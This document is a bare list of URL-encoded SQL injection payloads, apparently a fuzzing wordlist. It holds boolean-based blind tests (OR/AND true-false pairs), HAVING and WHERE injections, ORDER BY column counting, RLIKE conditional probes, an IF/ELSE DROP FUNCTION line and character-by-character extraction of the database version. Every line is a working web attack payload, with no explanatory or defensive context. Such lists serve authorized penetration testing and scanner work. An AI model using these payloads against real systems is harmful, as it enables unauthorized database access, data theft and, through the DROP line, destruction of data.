%20%27OR%201%3D1
%20%27OR%201%3D0
%20%27OR%20x%3Dx
%20%27OR%20x%3Dy
%20%27OR%201%3D1%23
%20%27OR%201%3D0%23
%20%27OR%20x%3Dx%23
%20%27OR%20x%3Dy%23
%20%27OR%201%3D1--
%20%27OR%201%3D0--
%20%27OR%20x%3Dx--
%20%27OR%20x%3Dy--
%20%27OR%203409%3D3409%20AND%20%28%27pytW%27%20LIKE%20%27pytW
%20%27OR%203409%3D3409%20AND%20%28%27pytW%27%20LIKE%20%27pytY
%20%27HAVING%201%3D1
%20%27HAVING%201%3D0
%20%27HAVING%201%3D1%23
%20%27HAVING%201%3D0%23
%20%27HAVING%201%3D1--
%20%27HAVING%201%3D0--
%20%27AND%201%3D1
%20%27AND%201%3D0
%20%27AND%201%3D1--
%20%27AND%201%3D0--
%20%27AND%201%3D1%23
%20%27AND%201%3D0%23
%20%27AND%201%3D1%20AND%20%27%25%27%3D%27
%20%27AND%201%3D0%20AND%20%27%25%27%3D%27
%20%27AND%201083%3D1083%20AND%20%281427%3D1427
%20%27AND%207506%3D9091%20AND%20%285913%3D5913
%20%27AND%201083%3D1083%20AND%20%28%271427%3D1427
%20%27AND%207506%3D9091%20AND%20%28%275913%3D5913
%20%27AND%207300%3D7300%20AND%20%27pKlZ%27%3D%27pKlZ
%20%27AND%207300%3D7300%20AND%20%27pKlZ%27%3D%27pKlY
%20%27AND%207300%3D7300%20AND%20%28%27pKlZ%27%3D%27pKlZ
%20%27AND%207300%3D7300%20AND%20%28%27pKlZ%27%3D%27pKlY
%20%27AS%20INJECTX%20WHERE%201%3D1%20AND%201%3D1
%20%27AS%20INJECTX%20WHERE%201%3D1%20AND%201%3D0
%20%27AS%20INJECTX%20WHERE%201%3D1%20AND%201%3D1%23
%20%27AS%20INJECTX%20WHERE%201%3D1%20AND%201%3D0%23
%20%27AS%20INJECTX%20WHERE%201%3D1%20AND%201%3D1--
%20%27AS%20INJECTX%20WHERE%201%3D1%20AND%201%3D0--
%20%27WHERE%201%3D1%20AND%201%3D1
%20%27WHERE%201%3D1%20AND%201%3D0
%20%27WHERE%201%3D1%20AND%201%3D1%23
%20%27WHERE%201%3D1%20AND%201%3D0%23
%20%27WHERE%201%3D1%20AND%201%3D1--
%20%27WHERE%201%3D1%20AND%201%3D0--
%20%27ORDER%20BY%201--
%20%27ORDER%20BY%202--
%20%27ORDER%20BY%203--
%20%27ORDER%20BY%204--
%20%27ORDER%20BY%205--
%20%27ORDER%20BY%206--
%20%27ORDER%20BY%207--
%20%27ORDER%20BY%208--
%20%27ORDER%20BY%209--
%20%27ORDER%20BY%2010--
%20%27ORDER%20BY%2011--
%20%27ORDER%20BY%2012--
%20%27ORDER%20BY%2013--
%20%27ORDER%20BY%2014--
%20%27ORDER%20BY%2015--
%20%27ORDER%20BY%2016--
%20%27ORDER%20BY%2017--
%20%27ORDER%20BY%2018--
%20%27ORDER%20BY%2019--
%20%27ORDER%20BY%2020--
%20%27ORDER%20BY%2021--
%20%27ORDER%20BY%2022--
%20%27ORDER%20BY%2023--
%20%27ORDER%20BY%2024--
%20%27ORDER%20BY%2025--
%20%27ORDER%20BY%2026--
%20%27ORDER%20BY%2027--
%20%27ORDER%20BY%2028--
%20%27ORDER%20BY%2029--
%20%27ORDER%20BY%2030--
%20%27ORDER%20BY%2031337--
%20%27ORDER%20BY%201%23
%20%27ORDER%20BY%202%23
%20%27ORDER%20BY%203%23
%20%27ORDER%20BY%204%23
%20%27ORDER%20BY%205%23
%20%27ORDER%20BY%206%23
%20%27ORDER%20BY%207%23
%20%27ORDER%20BY%208%23
%20%27ORDER%20BY%209%23
%20%27ORDER%20BY%2010%23
%20%27ORDER%20BY%2011%23
%20%27ORDER%20BY%2012%23
%20%27ORDER%20BY%2013%23
%20%27ORDER%20BY%2014%23
%20%27ORDER%20BY%2015%23
%20%27ORDER%20BY%2016%23
%20%27ORDER%20BY%2017%23
%20%27ORDER%20BY%2018%23
%20%27ORDER%20BY%2019%23
%20%27ORDER%20BY%2020%23
%20%27ORDER%20BY%2021%23
%20%27ORDER%20BY%2022%23
%20%27ORDER%20BY%2023%23
%20%27ORDER%20BY%2024%23
%20%27ORDER%20BY%2025%23
%20%27ORDER%20BY%2026%23
%20%27ORDER%20BY%2027%23
%20%27ORDER%20BY%2028%23
%20%27ORDER%20BY%2029%23
%20%27ORDER%20BY%2030%23
%20%27ORDER%20BY%2031337%23
%20%27ORDER%20BY%201
%20%27ORDER%20BY%202
%20%27ORDER%20BY%203
%20%27ORDER%20BY%204
%20%27ORDER%20BY%205
%20%27ORDER%20BY%206
%20%27ORDER%20BY%207
%20%27ORDER%20BY%208
%20%27ORDER%20BY%209
%20%27ORDER%20BY%2010
%20%27ORDER%20BY%2011
%20%27ORDER%20BY%2012
%20%27ORDER%20BY%2013
%20%27ORDER%20BY%2014
%20%27ORDER%20BY%2015
%20%27ORDER%20BY%2016
%20%27ORDER%20BY%2017
%20%27ORDER%20BY%2018
%20%27ORDER%20BY%2019
%20%27ORDER%20BY%2020
%20%27ORDER%20BY%2021
%20%27ORDER%20BY%2022
%20%27ORDER%20BY%2023
%20%27ORDER%20BY%2024
%20%27ORDER%20BY%2025
%20%27ORDER%20BY%2026
%20%27ORDER%20BY%2027
%20%27ORDER%20BY%2028
%20%27ORDER%20BY%2029
%20%27ORDER%20BY%2030
%20%27ORDER%20BY%2031337
%20%27RLIKE%20%28SELECT%20%28CASE%20WHEN%20%284346%3D4346%29%20THEN%200x61646d696e%20ELSE%200x28%20END%29%29%20AND%20%27Txws%27%3D%27
%20%27RLIKE%20%28SELECT%20%28CASE%20WHEN%20%284346%3D4347%29%20THEN%200x61646d696e%20ELSE%200x28%20END%29%29%20AND%20%27Txws%27%3D%27
%27IF%287423%3D7424%29%20SELECT%207423%20ELSE%20DROP%20FUNCTION%20xcjl--
%27IF%287423%3D7423%29%20SELECT%207423%20ELSE%20DROP%20FUNCTION%20xcjl--
%27%25%20AND%208310%3D8310%20AND%20%27%25%27%3D%27
%27%25%20AND%208310%3D8311%20AND%20%27%25%27%3D%27
%20%27and%20%28select%20substring%28%40%40version%2C1%2C1%29%29%3D%27X%27
%20%27and%20%28select%20substring%28%40%40version%2C1%2C1%29%29%3D%27M%27
%20%27and%20%28select%20substring%28%40%40version%2C2%2C1%29%29%3D%27i%27
%20%27and%20%28select%20substring%28%40%40version%2C2%2C1%29%29%3D%27y%27
%20%27and%20%28select%20substring%28%40%40version%2C3%2C1%29%29%3D%27c%27
%20%27and%20%28select%20substring%28%40%40version%2C3%2C1%29%29%3D%27S%27
%20%27and%20%28select%20substring%28%40%40version%2C3%2C1%29%29%3D%27X%27
